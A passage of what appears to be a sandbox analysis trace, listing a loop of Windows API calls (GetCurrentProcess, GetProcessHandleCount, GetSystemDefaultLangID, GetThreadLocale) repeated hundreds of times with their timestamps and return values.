0x409 [0168.612] GetCurrentProcess () returned 0xffffffff [0168.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.612] GetSystemDefaultLangID () returned 0x26b0409 [0168.612] GetThreadLocale () returned 0x409 [0168.612] GetCurrentProcess () returned 0xffffffff [0168.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.612] GetSystemDefaultLangID () returned 0x26b0409 [0168.612] GetThreadLocale () returned 0x409 [0168.613] GetCurrentProcess () returned 0xffffffff [0168.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.613] GetSystemDefaultLangID () returned 0x26b0409 [0168.613] GetThreadLocale () returned 0x409 [0168.613] GetCurrentProcess () returned 0xffffffff [0168.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.613] GetSystemDefaultLangID () returned 0x26b0409 [0168.613] GetThreadLocale () returned 0x409 [0168.613] GetCurrentProcess () returned 0xffffffff [0168.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.613] GetSystemDefaultLangID () returned 0x26b0409 [0168.613] GetThreadLocale () returned 0x409 [0168.613] GetCurrentProcess () returned 0xffffffff [0168.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.613] GetSystemDefaultLangID () returned 0x26b0409 [0168.613] GetThreadLocale () returned 0x409 [0168.613] GetCurrentProcess () returned 0xffffffff [0168.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.613] GetSystemDefaultLangID () returned 0x26b0409 [0168.613] GetThreadLocale () returned 0x409 [0168.613] GetCurrentProcess () returned 0xffffffff [0168.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.613] GetSystemDefaultLangID () returned 0x26b0409 [0168.613] GetThreadLocale () returned 0x409 [0168.613] GetCurrentProcess () returned 0xffffffff [0168.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.613] GetSystemDefaultLangID () returned 0x26b0409 [0168.613] GetThreadLocale () returned 0x409 [0168.613] GetCurrentProcess () returned 0xffffffff [0168.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.613] GetSystemDefaultLangID () returned 0x26b0409 [0168.613] GetThreadLocale () returned 0x409 [0168.613] GetCurrentProcess () returned 0xffffffff [0168.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.614] GetSystemDefaultLangID () returned 0x26b0409 [0168.614] GetThreadLocale () returned 0x409 [0168.614] GetCurrentProcess () returned 0xffffffff [0168.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.614] GetSystemDefaultLangID () returned 0x26b0409 [0168.614] GetThreadLocale () returned 0x409 [0168.614] GetCurrentProcess () returned 0xffffffff [0168.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.614] GetSystemDefaultLangID () returned 0x26b0409 [0168.614] GetThreadLocale () returned 0x409 [0168.614] GetCurrentProcess () returned 0xffffffff [0168.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.614] GetSystemDefaultLangID () returned 0x26b0409 [0168.614] GetThreadLocale () returned 0x409 [0168.614] GetCurrentProcess () returned 0xffffffff [0168.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.614] GetSystemDefaultLangID () returned 0x26b0409 [0168.614] GetThreadLocale () returned 0x409 [0168.614] GetCurrentProcess () returned 0xffffffff [0168.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.614] GetSystemDefaultLangID () returned 0x26b0409 [0168.614] GetThreadLocale () returned 0x409 [0168.614] GetCurrentProcess () returned 0xffffffff [0168.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.614] GetSystemDefaultLangID () returned 0x26b0409 [0168.614] GetThreadLocale () returned 0x409 [0168.614] GetCurrentProcess () returned 0xffffffff [0168.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.614] GetSystemDefaultLangID () returned 0x26b0409 [0168.614] GetThreadLocale () returned 0x409 [0168.614] GetCurrentProcess () returned 0xffffffff [0168.614] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.615] GetSystemDefaultLangID () returned 0x26b0409 [0168.615] GetThreadLocale () returned 0x409 [0168.615] GetCurrentProcess () returned 0xffffffff [0168.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.615] GetSystemDefaultLangID () returned 0x26b0409 [0168.615] GetThreadLocale () returned 0x409 [0168.615] GetCurrentProcess () returned 0xffffffff [0168.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.615] GetSystemDefaultLangID () returned 0x26b0409 [0168.615] GetThreadLocale () returned 0x409 [0168.615] GetCurrentProcess () returned 0xffffffff [0168.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.615] GetSystemDefaultLangID () returned 0x26b0409 [0168.615] GetThreadLocale () returned 0x409 [0168.615] GetCurrentProcess () returned 0xffffffff [0168.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.615] GetSystemDefaultLangID () returned 0x26b0409 [0168.615] GetThreadLocale () returned 0x409 [0168.615] GetCurrentProcess () returned 0xffffffff [0168.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.615] GetSystemDefaultLangID () returned 0x26b0409 [0168.615] GetThreadLocale () returned 0x409 [0168.615] GetCurrentProcess () returned 0xffffffff [0168.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.615] GetSystemDefaultLangID () returned 0x26b0409 [0168.615] GetThreadLocale () returned 0x409 [0168.615] GetCurrentProcess () returned 0xffffffff [0168.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.615] GetSystemDefaultLangID () returned 0x26b0409 [0168.615] GetThreadLocale () returned 0x409 [0168.615] GetCurrentProcess () returned 0xffffffff [0168.615] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.615] GetSystemDefaultLangID () returned 0x26b0409 [0168.616] GetThreadLocale () returned 0x409 [0168.616] GetCurrentProcess () returned 0xffffffff [0168.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.616] GetSystemDefaultLangID () returned 0x26b0409 [0168.616] GetThreadLocale () returned 0x409 [0168.616] GetCurrentProcess () returned 0xffffffff [0168.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.616] GetSystemDefaultLangID () returned 0x26b0409 [0168.616] GetThreadLocale () returned 0x409 [0168.616] GetCurrentProcess () returned 0xffffffff [0168.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.616] GetSystemDefaultLangID () returned 0x26b0409 [0168.616] GetThreadLocale () returned 0x409 [0168.616] GetCurrentProcess () returned 0xffffffff [0168.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.616] GetSystemDefaultLangID () returned 0x26b0409 [0168.616] GetThreadLocale () returned 0x409 [0168.616] GetCurrentProcess () returned 0xffffffff [0168.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.616] GetSystemDefaultLangID () returned 0x26b0409 [0168.616] GetThreadLocale () returned 0x409 [0168.616] GetCurrentProcess () returned 0xffffffff [0168.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.616] GetSystemDefaultLangID () returned 0x26b0409 [0168.616] GetThreadLocale () returned 0x409 [0168.616] GetCurrentProcess () returned 0xffffffff [0168.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.616] GetSystemDefaultLangID () returned 0x26b0409 [0168.616] GetThreadLocale () returned 0x409 [0168.616] GetCurrentProcess () returned 0xffffffff [0168.616] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.616] GetSystemDefaultLangID () returned 0x26b0409 [0168.616] GetThreadLocale () returned 0x409 [0168.616] GetCurrentProcess () returned 0xffffffff [0168.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.617] GetSystemDefaultLangID () returned 0x26b0409 [0168.617] GetThreadLocale () returned 0x409 [0168.617] GetCurrentProcess () returned 0xffffffff [0168.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.617] GetSystemDefaultLangID () returned 0x26b0409 [0168.617] GetThreadLocale () returned 0x409 [0168.617] GetCurrentProcess () returned 0xffffffff [0168.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.617] GetSystemDefaultLangID () returned 0x26b0409 [0168.617] GetThreadLocale () returned 0x409 [0168.617] GetCurrentProcess () returned 0xffffffff [0168.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.617] GetSystemDefaultLangID () returned 0x26b0409 [0168.617] GetThreadLocale () returned 0x409 [0168.617] GetCurrentProcess () returned 0xffffffff [0168.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.617] GetSystemDefaultLangID () returned 0x26b0409 [0168.617] GetThreadLocale () returned 0x409 [0168.617] GetCurrentProcess () returned 0xffffffff [0168.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.617] GetSystemDefaultLangID () returned 0x26b0409 [0168.617] GetThreadLocale () returned 0x409 [0168.617] GetCurrentProcess () returned 0xffffffff [0168.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.617] GetSystemDefaultLangID () returned 0x26b0409 [0168.617] GetThreadLocale () returned 0x409 [0168.617] GetCurrentProcess () returned 0xffffffff [0168.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.617] GetSystemDefaultLangID () returned 0x26b0409 [0168.617] GetThreadLocale () returned 0x409 [0168.617] GetCurrentProcess () returned 0xffffffff [0168.617] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.618] GetSystemDefaultLangID () returned 0x26b0409 [0168.618] GetThreadLocale () returned 0x409 [0168.618] GetCurrentProcess () returned 0xffffffff [0168.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.618] GetSystemDefaultLangID () returned 0x26b0409 [0168.618] GetThreadLocale () returned 0x409 [0168.618] GetCurrentProcess () returned 0xffffffff [0168.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.618] GetSystemDefaultLangID () returned 0x26b0409 [0168.618] GetThreadLocale () returned 0x409 [0168.618] GetCurrentProcess () returned 0xffffffff [0168.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.618] GetSystemDefaultLangID () returned 0x26b0409 [0168.618] GetThreadLocale () returned 0x409 [0168.618] GetCurrentProcess () returned 0xffffffff [0168.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.618] GetSystemDefaultLangID () returned 0x26b0409 [0168.618] GetThreadLocale () returned 0x409 [0168.618] GetCurrentProcess () returned 0xffffffff [0168.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.618] GetSystemDefaultLangID () returned 0x26b0409 [0168.618] GetThreadLocale () returned 0x409 [0168.618] GetCurrentProcess () returned 0xffffffff [0168.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.618] GetSystemDefaultLangID () returned 0x26b0409 [0168.618] GetThreadLocale () returned 0x409 [0168.618] GetCurrentProcess () returned 0xffffffff [0168.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.618] GetSystemDefaultLangID () returned 0x26b0409 [0168.618] GetThreadLocale () returned 0x409 [0168.618] GetCurrentProcess () returned 0xffffffff [0168.618] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.618] GetSystemDefaultLangID () returned 0x26b0409 [0168.618] GetThreadLocale () returned 0x409 [0168.618] GetCurrentProcess () returned 0xffffffff [0168.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.619] GetSystemDefaultLangID () returned 0x26b0409 [0168.619] GetThreadLocale () returned 0x409 [0168.619] GetCurrentProcess () returned 0xffffffff [0168.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.619] GetSystemDefaultLangID () returned 0x26b0409 [0168.619] GetThreadLocale () returned 0x409 [0168.619] GetCurrentProcess () returned 0xffffffff [0168.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.619] GetSystemDefaultLangID () returned 0x26b0409 [0168.619] GetThreadLocale () returned 0x409 [0168.619] GetCurrentProcess () returned 0xffffffff [0168.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.619] GetSystemDefaultLangID () returned 0x26b0409 [0168.619] GetThreadLocale () returned 0x409 [0168.619] GetCurrentProcess () returned 0xffffffff [0168.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.619] GetSystemDefaultLangID () returned 0x26b0409 [0168.619] GetThreadLocale () returned 0x409 [0168.619] GetCurrentProcess () returned 0xffffffff [0168.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.619] GetSystemDefaultLangID () returned 0x26b0409 [0168.619] GetThreadLocale () returned 0x409 [0168.619] GetCurrentProcess () returned 0xffffffff [0168.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.619] GetSystemDefaultLangID () returned 0x26b0409 [0168.619] GetThreadLocale () returned 0x409 [0168.619] GetCurrentProcess () returned 0xffffffff [0168.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.619] GetSystemDefaultLangID () returned 0x26b0409 [0168.619] GetThreadLocale () returned 0x409 [0168.619] GetCurrentProcess () returned 0xffffffff [0168.619] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.620] GetSystemDefaultLangID () returned 0x26b0409 [0168.620] GetThreadLocale () returned 0x409 [0168.620] GetCurrentProcess () returned 0xffffffff [0168.620] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.620] GetSystemDefaultLangID () returned 0x26b0409 [0168.620] GetThreadLocale () returned 0x409 [0168.620] GetCurrentProcess () returned 0xffffffff [0168.620] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.620] GetSystemDefaultLangID () returned 0x26b0409 [0168.620] GetThreadLocale () returned 0x409 [0168.620] GetCurrentProcess () returned 0xffffffff [0168.620] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.620] GetSystemDefaultLangID () returned 0x26b0409 [0168.620] GetThreadLocale () returned 0x409 [0168.620] GetCurrentProcess () returned 0xffffffff [0168.620] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.620] GetSystemDefaultLangID () returned 0x26b0409 [0168.620] GetThreadLocale () returned 0x409 [0168.620] GetCurrentProcess () returned 0xffffffff [0168.620] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.620] GetSystemDefaultLangID () returned 0x26b0409 [0168.620] GetThreadLocale () returned 0x409 [0168.620] GetCurrentProcess () returned 0xffffffff [0168.620] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.620] GetSystemDefaultLangID () returned 0x26b0409 [0168.620] GetThreadLocale () returned 0x409 [0168.620] GetCurrentProcess () returned 0xffffffff [0168.620] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.620] GetSystemDefaultLangID () returned 0x26b0409 [0168.620] GetThreadLocale () returned 0x409 [0168.620] GetCurrentProcess () returned 0xffffffff [0168.620] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.621] GetSystemDefaultLangID () returned 0x26b0409 [0168.621] GetThreadLocale () returned 0x409 [0168.621] GetCurrentProcess () returned 0xffffffff [0168.621] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.621] GetSystemDefaultLangID () returned 0x26b0409 [0168.621] GetThreadLocale () returned 0x409 [0168.621] GetCurrentProcess () returned 0xffffffff [0168.621] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.621] GetSystemDefaultLangID () returned 0x26b0409 [0168.621] GetThreadLocale () returned 0x409 [0168.621] GetCurrentProcess () returned 0xffffffff [0168.621] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.621] GetSystemDefaultLangID () returned 0x26b0409 [0168.621] GetThreadLocale () returned 0x409 [0168.621] GetCurrentProcess () returned 0xffffffff [0168.621] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.621] GetSystemDefaultLangID () returned 0x26b0409 [0168.621] GetThreadLocale () returned 0x409 [0168.621] GetCurrentProcess () returned 0xffffffff [0168.621] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.621] GetSystemDefaultLangID () returned 0x26b0409 [0168.621] GetThreadLocale () returned 0x409 [0168.621] GetCurrentProcess () returned 0xffffffff [0168.621] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.621] GetSystemDefaultLangID () returned 0x26b0409 [0168.621] GetThreadLocale () returned 0x409 [0168.621] GetCurrentProcess () returned 0xffffffff [0168.622] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.622] GetSystemDefaultLangID () returned 0x26b0409 [0168.622] GetThreadLocale () returned 0x409 [0168.622] GetCurrentProcess () returned 0xffffffff [0168.622] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.622] GetSystemDefaultLangID () returned 0x26b0409 [0168.622] GetThreadLocale () returned 0x409 [0168.622] GetCurrentProcess () returned 0xffffffff [0168.622] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.622] GetSystemDefaultLangID () returned 0x26b0409 [0168.622] GetThreadLocale () returned 0x409 [0168.622] GetCurrentProcess () returned 0xffffffff [0168.622] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.622] GetSystemDefaultLangID () returned 0x26b0409 [0168.622] GetThreadLocale () returned 0x409 [0168.622] GetCurrentProcess () returned 0xffffffff [0168.622] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.622] GetSystemDefaultLangID () returned 0x26b0409 [0168.622] GetThreadLocale () returned 0x409 [0168.622] GetCurrentProcess () returned 0xffffffff [0168.622] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.622] GetSystemDefaultLangID () returned 0x26b0409 [0168.622] GetThreadLocale () returned 0x409 [0168.622] GetCurrentProcess () returned 0xffffffff [0168.622] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.622] GetSystemDefaultLangID () returned 0x26b0409 [0168.622] GetThreadLocale () returned 0x409 [0168.622] GetCurrentProcess () returned 0xffffffff [0168.622] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.623] GetSystemDefaultLangID () returned 0x26b0409 [0168.623] GetThreadLocale () returned 0x409 [0168.623] GetCurrentProcess () returned 0xffffffff [0168.623] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.623] GetSystemDefaultLangID () returned 0x26b0409 [0168.623] GetThreadLocale () returned 0x409 [0168.623] GetCurrentProcess () returned 0xffffffff [0168.623] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.623] GetSystemDefaultLangID () returned 0x26b0409 [0168.623] GetThreadLocale () returned 0x409 [0168.623] GetCurrentProcess () returned 0xffffffff [0168.623] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.623] GetSystemDefaultLangID () returned 0x26b0409 [0168.623] GetThreadLocale () returned 0x409 [0168.623] GetCurrentProcess () returned 0xffffffff [0168.623] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.623] GetSystemDefaultLangID () returned 0x26b0409 [0168.623] GetThreadLocale () returned 0x409 [0168.623] GetCurrentProcess () returned 0xffffffff [0168.623] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.623] GetSystemDefaultLangID () returned 0x26b0409 [0168.623] GetThreadLocale () returned 0x409 [0168.623] GetCurrentProcess () returned 0xffffffff [0168.623] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.623] GetSystemDefaultLangID () returned 0x26b0409 [0168.623] GetThreadLocale () returned 0x409 [0168.623] GetCurrentProcess () returned 0xffffffff [0168.623] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.623] GetSystemDefaultLangID () returned 0x26b0409 [0168.623] GetThreadLocale () returned 0x409 [0168.623] GetCurrentProcess () returned 0xffffffff [0168.623] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.623] GetSystemDefaultLangID () returned 0x26b0409 [0168.624] GetThreadLocale () returned 0x409 [0168.624] GetCurrentProcess () returned 0xffffffff [0168.624] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.624] GetSystemDefaultLangID () returned 0x26b0409 [0168.624] GetThreadLocale () returned 0x409 [0168.624] GetCurrentProcess () returned 0xffffffff [0168.624] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.624] GetSystemDefaultLangID () returned 0x26b0409 [0168.624] GetThreadLocale () returned 0x409 [0168.624] GetCurrentProcess () returned 0xffffffff [0168.624] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.624] GetSystemDefaultLangID () returned 0x26b0409 [0168.624] GetThreadLocale () returned 0x409 [0168.624] GetCurrentProcess () returned 0xffffffff [0168.624] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.624] GetSystemDefaultLangID () returned 0x26b0409 [0168.624] GetThreadLocale () returned 0x409 [0168.624] GetCurrentProcess () returned 0xffffffff [0168.624] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.624] GetSystemDefaultLangID () returned 0x26b0409 [0168.624] GetThreadLocale () returned 0x409 [0168.624] GetCurrentProcess () returned 0xffffffff [0168.624] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.624] GetSystemDefaultLangID () returned 0x26b0409 [0168.624] GetThreadLocale () returned 0x409 [0168.624] GetCurrentProcess () returned 0xffffffff [0168.624] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.624] GetSystemDefaultLangID () returned 0x26b0409 [0168.624] GetThreadLocale () returned 0x409 [0168.624] GetCurrentProcess () returned 0xffffffff [0168.624] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.624] GetSystemDefaultLangID () returned 0x26b0409 [0168.625] GetThreadLocale () returned 0x409 [0168.625] GetCurrentProcess () returned 0xffffffff [0168.625] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.625] GetSystemDefaultLangID () returned 0x26b0409 [0168.625] GetThreadLocale () returned 0x409 [0168.625] GetCurrentProcess () returned 0xffffffff [0168.625] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.625] GetSystemDefaultLangID () returned 0x26b0409 [0168.625] GetThreadLocale () returned 0x409 [0168.625] GetCurrentProcess () returned 0xffffffff [0168.625] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.625] GetSystemDefaultLangID () returned 0x26b0409 [0168.625] GetThreadLocale () returned 0x409 [0168.625] GetCurrentProcess () returned 0xffffffff [0168.625] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.625] GetSystemDefaultLangID () returned 0x26b0409 [0168.625] GetThreadLocale () returned 0x409 [0168.625] GetCurrentProcess () returned 0xffffffff [0168.625] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.625] GetSystemDefaultLangID () returned 0x26b0409 [0168.625] GetThreadLocale () returned 0x409 [0168.625] GetCurrentProcess () returned 0xffffffff [0168.625] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.625] GetSystemDefaultLangID () returned 0x26b0409 [0168.625] GetThreadLocale () returned 0x409 [0168.625] GetCurrentProcess () returned 0xffffffff [0168.625] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.625] GetSystemDefaultLangID () returned 0x26b0409 [0168.625] GetThreadLocale () returned 0x409 [0168.626] GetCurrentProcess () returned 0xffffffff [0168.626] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.626] GetSystemDefaultLangID () returned 0x26b0409 [0168.626] GetThreadLocale () returned 0x409 [0168.626] GetCurrentProcess () returned 0xffffffff [0168.626] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0168.626] GetSystemDefaultLangID () returned 0x26b0409 [0168.626] GetThreadLocale () returned 0x409 [0168.626] GetCurrentProcess () returned 0xffffffff [0168.626] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 